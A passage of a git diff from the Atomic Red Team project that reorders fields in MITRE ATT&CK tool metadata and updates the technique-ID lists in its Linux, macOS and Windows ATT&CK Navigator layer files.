"id": "tool--c256da91-6dd5-40b2-beeb-ee3b22ab3d27",
@@ -204680,17 +234882,17 @@
],
"modified": "2020-03-20T18:41:43.461Z",
"created": "2019-09-03T18:25:36.963Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "esentutl",
- "esentutl.exe"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
- ]
+ "x_mitre_aliases": [
+ "esentutl",
+ "esentutl.exe"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54",
@@ -204718,13 +234920,13 @@
],
"modified": "2020-03-30T18:35:48.851Z",
"created": "2017-05-31T21:32:13.755Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"gsecdump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--362dc67f-4e85-4562-9dac-1b6b7f3ec4b5",
@@ -204887,14 +235089,14 @@
],
"modified": "2020-03-31T12:41:22.189Z",
"created": "2017-05-31T21:33:06.083Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"netsh",
"netsh.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--4664b683-f578-434f-919b-1c1aad2a1111",
@@ -204959,13 +235161,13 @@
],
"modified": "2020-03-30T18:40:16.684Z",
"created": "2017-05-31T21:32:13.051Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"pwdump"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de",
@@ -205030,14 +235232,14 @@
],
"modified": "2020-03-31T12:42:36.620Z",
"created": "2017-05-31T21:33:07.218Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"schtasks",
"schtasks.exe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--33b9e38f-103c-412d-bdcf-904a91fff1e4",
@@ -205069,13 +235271,13 @@
],
"modified": "2020-03-30T18:40:56.558Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"spwebmember"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555",
@@ -205417,7 +235619,7 @@
"x-mitre-tactic--9a4e74ab-5008-408c-84bf-a10dfbc53462",
"x-mitre-tactic--5569339b-94c2-49ee-afb3-2222936582c8"
],
- "modified": "2020-03-27T18:45:53.032Z",
+ "modified": "2020-07-02T14:18:03.651Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
index e6aa41ec..7b2c7acc 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1551.002","score":100,"enabled":true},{"techniqueID":"T1551.003","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
index f59256bf..74157231 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1551.002","score":100,"enabled":true},{"techniqueID":"T1551.003","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index b92a62d7..56dfa32f 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@
-{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.015","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1551.001","score":100,"enabled":true},{"techniqueID":"T1551.004","score":100,"enabled":true},{"techniqueID":"T1551.005","score":100,"enabled":true},{"techniqueID":"T1551.006","score":100,"enabled":true},{"techniqueID":"T1551","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.010","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true}]}
\ No newline at end of file
+{"version":"3.0","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{